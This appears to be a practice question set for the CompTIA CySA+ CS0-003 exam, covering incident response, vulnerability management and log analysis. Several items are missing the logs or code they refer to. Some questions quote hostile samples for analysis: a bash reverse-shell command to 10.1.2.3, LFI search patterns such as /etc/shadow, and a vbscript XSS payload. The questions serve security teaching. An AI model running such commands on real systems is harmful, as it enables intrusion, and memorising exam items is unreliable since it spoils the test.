Test B CompTIA CYSA+ CS0-003

A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?. The server was configured to use SSL to securely transmit data. The server was supporting weak TLS protocols for client connections. The malware infected all the web servers in the pool. The digital certificate on the web server was self-signed.

A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability: Log entry 1. Log entry 2. Log entry 3. Log entry 4.

A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?. Interview the users who access these systems. Scan the systems to see which vulnerabilities currently exist. Configure alerts for vendor-specific zero-day exploits. Determine the asset value of each system.

A security analyst is reviewing the following alert that was triggered by FIM on a critical system: A fake antivirus program was installed by the user. A network drive was added to allow exfiltration of data. A new program has been set to execute on system start. The host firewall on 192.168.1.10 was disabled.

Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?. SLA. LOI. MOU. KPI.

A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?. Data exfiltration. Rogue device. Scanning. Beaconing.

An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Choose two). Drop the tables on the database server to prevent data exfiltration. Deploy EDR on the web server and the database server to reduce the adversary’s capabilities. Stop the httpd service on the web server so that the adversary can not use web exploits. Use microsegmentation to restrict connectivity to/from the web and database servers. Comment out the HTTP account in the /etc/passwd file of the web server. Move the database from the database server to the web server.

An incident response team member is triaging a Linux server. The output is shown below: Create a backdoor root account named zsh. Execute commands through an unsecured service account. Send a beacon to a command-and-control server. Perform a denial-of-service attack on the web server.

A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application: getConnection(database01,"alpha" ,"AxTv.127GdCx94GTd"); Which of the following is the most likely vulnerability in this system?. Lack of input validation. SQL injection. Hard-coded credential. Buffer overflow.

A technician is analyzing output from a popular network mapping tool for a PCI audit: The host is not up or responding. The host is running excessive cipher suites. The host is allowing insecure cipher suites. The Secure Shell port on this host is closed.

A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?. SIEM. XDR. SOAR. EDR.

An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?. Disable the user’s network account and access to web resources. Make a copy of the files as a backup on the server. Place a legal hold on the device and the user’s network share. Make a forensic image of the device and create a SHA-1 hash.

An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?. Insider threat. Ransomware group. Nation-state. Organized crime.

A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?. config.in. ntds.dit. Master boot record. Registry.

While reviewing web server logs, a security analyst found the following line: < IMG SRC='vbscript:msgbox("test")' > Which of the following malicious activities was attempted?. Command injection. XML injection. Server-side request forgery. Cross-site scripting.

A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://office365password.acme.co. The site’s standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?. This is a normal password change URL. The security operations center is performing a routine password audit. A new VPN gateway has been deployed. A social engineering attack is underway.

A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?. Operating system version. Registry key values. Open ports. IP address.

A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?. /etc/shadow. curl localhost. ; printenv. cat /proc/self/.

A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?. Non-credentialed scanning. Passive scanning. Agent-based scanning. Credentialed scanning.

A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?. Leave the proxy as is. Decomission the proxy. Migrate the proxy to the cloud. Patch the proxy.

An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?. Access rights. Network segmentation. Time synchronization. Invalid playbook.

An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?. SOAR. SIEM. SLA. IoC.

An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst’s concern?. Any discovered vulnerabilities will not be remediated. An outage of machinery would cost the organization money. Support will not be available for the critical machinery. There are no compensating controls in place for the OS.

Which of the following describes the best reason for conducting a root cause analysis?. The root cause analysis ensures that proper timelines were documented. The root cause analysis allows the incident to be properly documented for reporting. The root cause analysis develops recommendations to improve the process. The root cause analysis identifies the contributing items that facilitated the event.

Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?. Command and control. Data enrichment. Automation. Single sign-on.

A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device’s operating system. Which of the following best meets this requirement?. SIEM. CASB. SOAR. EDR.

A security analyst identified the following suspicious entry on the host-based IDS logs: bash -i >& /dev/tcp/10.1.2.3/8080 0>&1 Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?. #!/bin/bash nc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" || echo "OK". #!/bin/bash ps -fea | grep 8080 >dev/null && echo "Malicious activity" || echo "OK". #!/bin/bash ls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" || echo "OK". #!/bin/bash netstat -antp | grep 8080 >dev/null && echo "Malicious activity" || echo "OK".

A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?. Implement segmentation with ACLs. Configure logging and monitoring to the SIEM. Deploy MFA to cloud storage locations. Roll out an IDS.

A security analyst is reviewing the findings of the latest vulnerability report for a company’s web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?. Deploy a WAF to the front of the application. Replace the current MD5 with SHA-256. Deploy an antivirus application on the hosting system. Replace the MD5 with digital signatures.

A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?. Conduct security awareness training on the risks of using unknown and unencrypted USBs. Write a removable media policy that explains that USBs cannot be connected to a company asset. Check configurations to determine whether USB ports are enabled on company assets. Review logs to see whether this exploitable vulnerability has already impacted the company.

A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?. Nmap. TCPDump. SIEM. EDR.

A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below: Directory traversal. XSS. XXE. SSRF.

Which of the following is the most important factor to ensure accurate incident response reporting?. A well-defined timeline of the events. A guideline for regulatory reporting. Logs from the impacted system. A well-developed executive summary.

A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?. grep [IP address] packets.pcap. cat packets.pcap | grep [IP Address]. tcpdump -n -r packets.pcap host [IP address]. strings packets.pcap | grep [IP Address].

A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?. CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H.

A security analyst must review a suspicious email to determine its legitimacy. Which of the following should be performed? (Choose two.). Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level. Review the headers from the forwarded email. Examine the recipient address field. Review the Content-Type header. Evaluate the HELO or EHLO string of the connecting email server. Examine the SPF, DKIM, and DMARC fields from the original email.

A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0. AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L - Base Score 7.2. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5.

A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?. Integrate an IT service delivery ticketing system to track remediation and closure. Create a compensating control item until the system can be fully patched. Accept the risk and decommission current assets as end of life. Request an exception and manually patch each system.

Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?. Join an information sharing and analysis center specific to the company's industry. Upload threat intelligence to the IPS in STIX'TAXII format. Add data enrichment for IPs in the ingestion pipeline. Review threat feeds after viewing the SIEM alert.

An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that could reduce the impact of this situation?. Multifactor authentication. Password changes. System hardening. Password encryption.

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?. Deploy agents on all systems to perform the scans. Deploy a central scanner and perform non-credentialed scans. Deploy a cloud-based scanner and perform a network scan. Deploy a scanner sensor on every segment and perform credentialed scans.

An organization's email account was compromised by a bad actor. Given the following information: Data masking. Hashing. Watermarking. Encoding.

A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality?. Data masking. Hashing. Watermarking. Encoding.

The email system administrator for an organization configured DKIM signing for all email legitimately sent by the organization. Which of the following would most likely indicate an email is malicious if the company's domain name is used as both the sender and the recipient?. The message fails a DMARC check. The sending IP address is the hosting provider. The signature does not meet corporate standards. The sender and reply address are different.

During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the analyst with this information?. Header analysis. Packet capture. SSL inspection. Reverse engineering.

An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed?. Blocklisting. Allowlisting. Graylisting. Webhooks.

During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?. Shut down the server. Reimage the server. Quarantine the server. Update the OS to latest version.

An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?. Perform a tabletop drill based on previously identified incident scenarios. Simulate an incident by shutting down power to the primary data center. Migrate active workloads from the primary data center to the secondary location. Compare the current plan to lessons learned from previous incidents.

Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?. Deploy a database to aggregate the logging. Configure the servers to forward logs to a SIEM. Share the log directory on each server to allow local access. Automate the emailing of logs to the analysts.

Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?. Mean time to detect. Mean time to respond. Mean time to remediate. Service-level agreement uptime.

After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising?. Transfer. Accept. Mitigate. Avoid.

A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?. Wipe the computer and reinstall software. Shut down the email server and quarantine it from the network. Acquire a bit-level image of the affected workstation. Search for other mail users who have received the same file.

The security analyst received the monthly vulnerability report. The following findings were included in the report: • Five of the systems only required a reboot to finalize the patch application • Two of the servers are running outdated operating systems and cannot be patched The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?. Compensating controls. Due diligence. Maintenance windows. Passive discovery.

The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company: Vulnerability A. Vulnerability B. Vulnerability C. Vulnerability D.

An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the following steps is most important during the transition between the two analysts?. Identify and discuss the lessons learned with the prior analyst. Accept all findings and continue to investigate the next item target. Review the steps that the previous analyst followed. Validate the root cause from the prior analyst.

A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information: nessie.explosion. vote.4p. sweet.bike. great.skills.

A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. Which of the following would best address this issue?. Increasing training and awareness for all staff. Ensuring that malicious websites cannot be visited. Blocking all scripts downloaded from the internet. Disabling all staff members’ ability to run downloaded applications.

A security analyst at a company is reviewing an alert from the file integrity monitoring indicating a mismatch in the login. html file hash. After comparing the code with the previous version of the page source code, the analyst found the following code snippet added: Obfuscated links. Exfiltration. Unauthorized changes. Beaconing.

A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?. Credentialed scar. External scan. Differential scan. Network scan.

An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the control was unable to detect an attack with nine failed logins. Which of the following best represents what occurred?. False positive. True negative. False negative. True positive.

A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of following best fits the type of scanning activity requested?. Uncredentialed scan. Discovery scan. Vulnerability scan. Credentialed scan.

Which of the following best describes the process of requiring remediation of a known threat within a given time frame?. SLA. MOU. Best-effort patching. Organizational governance.

Which of the following risk management principles is accomplished by purchasing cyber insurance?. Accept. Avoid. Mitigate. Transfer.

A recent audit of the vulnerability management program outlined the finding for increased awareness of secure coding practices. Which of the following would be best to address the finding?. Establish quarterly SDLC training on the top vulnerabilities for developers. Conduct a yearly inspection of the code repositories and provide the report to management. Hire an external penetration test of the network. Deploy more vulnerability scanners for increased coverage.

An organization has deployed a cloud-based storage system for shared data that is in phase two of the data life cycle. Which of the following controls should the security team ensure are addressed? (Choose two.). Data classification. Data destruction. Data loss prevention. Encryption. Backups. Access controls.

An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and the cause is traced back to the vulnerability scanner. Which of the following is the cause of this issue?. The scanner is running without an agent installed. The scanner is running in active mode. The scanner is segmented improperly. The scanner is configured with a scanning window.

An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?. Set user account control protection to the most restrictive level on all devices. Implement MFA requirements for all internal resources. Harden systems by disabling or removing unnecessary services. Implement controls to block execution of untrusted applications.

A new zero-day vulnerability was released. A security analyst is prioritizing which systems should receive deployment of compensating controls deployment first. The systems have been grouped into the categories shown below: Group A. Group B. Group C. Group D.

A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around?. OSSTMM. Diamond Model of Intrusion Analysis. OWASP. MITRE ATT&CK.

Which of the following actions would an analyst most likely perform after an incident has been investigated?. Risk assessment. Root cause analysis. Incident response plan. Tabletop exercise.

After completing a review of network activity, the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which of the following is potentially occurring?. Irregular peer-to-peer communication. Rogue device on the network. Abnormal OS process behavior. Data exfiltration.

A vulnerability scanner generates the following output: Oracle JDK. Cisco Webex. Redis Server. SSL Self-signed Certificate.

A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?. Instruct the firewall engineer that a rule needs to be added to block this external server. Escalate the event to an incident and notify the SOC manager of the activity. Notify the incident response team that there is a DDoS attack occurring. Identify the IP/hostname for the requests and look at the related activity.